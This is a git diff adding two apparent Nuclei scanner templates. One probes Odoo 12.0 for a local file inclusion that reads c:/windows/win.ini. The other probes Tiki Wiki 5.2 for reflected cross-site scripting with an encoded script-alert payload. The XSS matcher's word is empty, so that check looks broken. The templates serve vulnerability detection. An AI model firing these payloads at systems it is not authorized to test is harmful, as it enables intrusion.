diff --git a/cves/CVE-2019-14322.yaml b/cves/CVE-2019-14322.yaml new file mode 100644 index 0000000000..fb2ebfceca --- /dev/null +++ b/cves/CVE-2019-14322.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-14322 + +info: + name: Odoo 12.0 - Local File Inclusion + author: madrobot + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/base_import/static/c:/windows/win.ini" + - "{{BaseURL}}/web/static/c:/windows/win.ini" + - "{{BaseURL}}/base/static/c:/windows/win.ini" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body \ No newline at end of file diff --git a/vulnerabilities/tikiwiki-reflected-xss.yaml b/vulnerabilities/tikiwiki-reflected-xss.yaml new file mode 100644 index 0000000000..ba54702ec5 --- /dev/null +++ b/vulnerabilities/tikiwiki-reflected-xss.yaml @@ -0,0 +1,22 @@ +id: tikiwiki-reflected-xss + +info: + name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting + author: madrobot + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" + - "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body \ No newline at end of file